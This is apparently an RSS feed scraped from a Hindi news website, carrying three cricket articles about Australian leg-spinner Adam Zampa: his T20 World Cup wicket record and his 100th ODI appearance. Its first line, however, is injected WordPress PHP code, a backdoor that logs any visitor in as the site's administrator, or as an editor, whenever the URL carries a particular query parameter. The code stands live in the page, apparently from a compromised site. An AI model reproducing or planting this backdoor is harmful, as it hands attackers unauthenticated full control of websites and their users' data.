// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); Adam Zampa – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 12 Feb 2026 15:20:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 टी20 वर्ल्ड कप में सर्वाधिक विकेट लेने वाले नंबर-2 गेंदबाज बने एडम जांपा https://pratyushaashakinayikiran.com/?p=197374 Thu, 12 Feb 2026 15:20:00 +0000 https://pratyushaashakinayikiran.com/?p=197374 कोलंबो
एडम जांपा टी20 वर्ल्ड कप इतिहास में सर्वाधिक विकेट लेने वाले खिलाड़ियों की सूची में संयुक्त रूप से दूसरे पायदान पर पहुंच गए हैं। इस लेग स्पिनर ने अब तक टी20 वर्ल्ड कप में 40 विकेट हासिल किए हैं, जिसके साथ उन्होंने वानिंदु हसरंगा और राशिद खान की बराबरी कर ली है।

इन तीनों ही गेंदबाजों ने टी20 वर्ल्ड कप में 40-40 विकेट हासिल किए हैं, जबकि शाहिद अफरीदी 39 विकेट के साथ इस लिस्ट में तीसरे स्थान पर हैं। शीर्ष पर बांग्लादेश के शाकिब अल हसन हैं, जिन्होंने 50 विकेट अपने नाम किए। आयरलैंड के खिलाफ इस मुकाबले में एडम जांपा ने 4 ओवर गेंदबाजी करते हुए 23 रन देकर 4 विकेट निकाले।

यह जांपा का टी20 वर्ल्ड कप में दूसरा ‘फोर-विकेट हॉल’ है। उन्होंने टूर्नामेंट में एक बार मैच में 5 विकेट भी निकाले हैं। कुल मिलाकर, जांपा ने टी20 अंतरराष्ट्रीय क्रिकेट के 112 मुकाबलों में 20.56 की औसत से 143 विकेट लिए हैं।

इस मुकाबले में ऑस्ट्रेलिया ने पहले बल्लेबाजी करते हुए 6 विकेट खोकर 182 रन बनाए। इस टीम के लिए मार्कस स्टोइनिस ने सर्वाधिक 45 रन बनाए, जबकि मैट रेनेशॉ और जोश इंगलिस ने 37-37 रन का योगदान टीम के खाते में दिया। विपक्षी खेमे से मार्क अडायर ने सर्वाधिक 2 विकेट हासिल किए, जबकि मैथ्यू हम्फ्रीज, जॉर्ज डॉकरेल और हैरी टेक्टर ने 1-1 विकेट निकाला।

इसके जवाब में आयरलैंड की टीम 16.5 ओवरों में 115 रन पर सिमट गई। इस टीम के लिए जॉर्ज डॉकरेल ने सर्वाधिक 41 रन बनाए, जबकि लॉरेन टकर ने 24 रन का योगदान टीम के खाते में दिया। ऑस्ट्रेलिया की तरफ से नाथन एलिस और एडम जांपा ने 4-4 विकेट निकाले। एक विकेट मैथ्यू कुहनेमन के हाथ लगा।

ऑस्ट्रेलियाई टीम 13 फरवरी को अपने अगले मुकाबले में इसी वेन्यू पर जिम्बाब्वे से भिड़ेगी, जो टी20 वर्ल्ड कप 2026 के उनके ग्रुप स्टेज का दूसरा मैच होगा। इस मुकाबले में जांपा के पास राशिद और हसरंगा से आगे निकलने का मौका होगा।

 

]]>
कभी उम्मीद नहीं थी कि ऑस्ट्रेलिया के लिए 100 वनडे मैच खेल सकूंगा : एडम जम्पा https://pratyushaashakinayikiran.com/?p=72429 Thu, 19 Sep 2024 10:26:00 +0000 https://pratyushaashakinayikiran.com/?p=72429 नई दिल्ली
 इंग्लैंड के खिलाफ 19 सितंबर को ट्रेंट ब्रिज में ऑस्ट्रेलिया की आगामी एकदिवसीय श्रृंखला का पहला मैच एडम जम्पा के लिए 50 ओवर के प्रारूप में 100वां मैच भी होगा। इस मील के पत्थर तक पहुँचने के कगार पर खड़े जम्पा ने कहा कि उन्होंने कभी भी अपने देश के लिए वनडे में इतने मैच खेलने की उम्मीद नहीं की थी।

जम्पा 100 वनडे खेलने वाले 32वें ऑस्ट्रेलियाई पुरुष खिलाड़ी बन जाएँगे। वह शेन वॉर्न और ब्रैग हॉग के बाद ऑस्ट्रेलिया के लिए यह उपलब्धि हासिल करने वाले सिर्फ तीसरे विशेषज्ञ स्पिनर बन जाएँगे। जम्पा की पत्नी हैरियट, बेटा यूजीन और माता-पिता डैरेन और एलिसन लेग स्पिनर को यह उपलब्धि हासिल करते देखने के लिए ट्रेंट ब्रिज में मौजूद रहेंगे।

क्रिकेट डॉट कॉम डॉट एयू से बातचीत में जम्पा ने कहा, मुझे 100 वनडे खेलने पर गर्व है, मैंने कभी नहीं सोचा था कि मैं ऑस्ट्रेलिया के लिए इतना खेल पाऊंगा। जब आप देखते हैं कि आजकल लोग वनडे क्रिकेट में कितने मैच खेलते हैं, तो बहुत कम लोग 100 तक पहुंच पाते हैं, खासकर अतीत के लोगों की तुलना में; 1990 और 2000 के दशक की शुरुआत में निश्चित रूप से बहुत ज़्यादा वनडे क्रिकेट खेला जाता था और कोई टी20 नहीं होता था। मैं कुल मिलाकर 200 अंतरराष्ट्रीय मैच (191) खेलने के करीब पहुंच रहा हूं, इसलिए मुझे कभी नहीं लगा था कि मैं इतना खेल पाऊंगा।

99 वनडे मैचों में जम्पा ने 28.05 की औसत और 5.47 की इकॉनमी रेट से 169 विकेट लिए हैं। हालांकि जम्पा 2021 और 2023 में ऑस्ट्रेलिया के लिए क्रमशः टी20 विश्व कप और एकदिवसीय विश्व कप विजेता रहे हैं, उन्होंने कहा कि अधिक विश्व कप जीतने की चाह अभी भी उनके अंदर जल रही है, खासकर 2026 पुरुष टी20 विश्व कप को देखते हुए जो भारत और श्रीलंका में हो रहा है।

उन्होंने कहा, अपने देश के लिए खेलना और जीतना, फ्रैंचाइज़ क्रिकेट खेलने और फ्रैंचाइज़ क्रिकेट जीतने से कहीं बेहतर है। मैंने द हंड्रेड (2024 चैंपियन ओवल इनविंसिबल्स के लिए) का अनुभव किया और यह शानदार था। मुझे इसे खेलना बहुत पसंद था और अंत में जीतना एक बोनस था। लेकिन जब आप अपने देश के लिए खेलते हैं और जब आप विश्व कप जीतते हैं तो यह अलग होता है, और मेरे पास अभी भी कई और जीतने की इच्छा है।

 

]]>
ऑस्ट्रेलिया की आगामी वनडे सीरीज का पहला मैच कल खेला जाएगा, एडम जम्पा खेलेंगे अपना 100वां मैच https://pratyushaashakinayikiran.com/?p=72058 Wed, 18 Sep 2024 14:56:00 +0000 https://pratyushaashakinayikiran.com/?p=72058 नई दिल्ली
ऑस्ट्रेलिया की आगामी वनडे सीरीज का पहला मैच 19 सितंबर को इंग्लैंड के खिलाफ ट्रेंट ब्रिज में खेला जाएगा। इस मुकाबले में एडम जम्पा इस फॉर्मेट में अपना 100वां मैच खेलेंगे। इस उपलब्धि को हासिल करने के करीब पहुंचने पर जम्पा ने कहा कि उन्होंने कभी नहीं सोचा था कि वह अपने देश के लिए वनडे में इतने मैच खेल पाएंगे।

वे 100 वनडे खेलने वाले 32वें ऑस्ट्रेलियाई पुरुष खिलाड़ी बन जाएंगे। साथ ही शेन वॉर्न और ब्रैड हॉग के बाद ऑस्ट्रेलिया के लिए यह उपलब्धि हासिल करने वाले वे सिर्फ तीसरे विशेषज्ञ स्पिनर बन जाएंगे। इस खास मौके पर उनकी पत्नी हेरिएट, बेटा यूजीन और माता-पिता डैरेन और एलिसन ट्रेंट ब्रिज में मौजूद रहेंगे।

क्रिकेट डॉट कॉम डॉट एयू से बात करते हुए जम्पा ने कहा, “मैं 100 वनडे मैच खेलने पर गर्व महसूस कर रहा हूं। मैंने कभी नहीं सोचा था कि मैं ऑस्ट्रेलिया के लिए इतना खेलूंगा। जब आप देखते हैं कि आजकल लोग कितने वनडे मैच खेलते हैं, तो बहुत कम लोग 100 मैच खेल पाते हैं। 1990 और 2000 के दशक की शुरुआत में निश्चित रूप से बहुत अधिक वनडे क्रिकेट खेला जाता था और कोई टी20 मैच नहीं होता था। मैं कुल मिलाकर 200 अंतरराष्ट्रीय मैच (191) खेलने के करीब पहुंच रहा हूं, इसलिए मुझे इतना खेलने की उम्मीद नहीं थी।”

99 वनडे मैचों में इस ऑस्ट्रेलियाई खिलाड़ी ने 28.05 की औसत और 5.47 की इकॉनमी रेट से 169 विकेट लिए हैं। हालांकि जम्पा 2021 और 2023 में ऑस्ट्रेलिया के लिए क्रमशः टी20 विश्व कप और वनडे विश्व कप विजेता रहे हैं, लेकिन उन्होंने कहा कि अधिक विश्व कप जीतने की चाह अभी भी उनके अंदर है। खासकर 2026 में भारत और श्रीलंका में होने वाले पुरुष टी20 विश्व कप पर उनका पूरा फोकस है।

 

]]>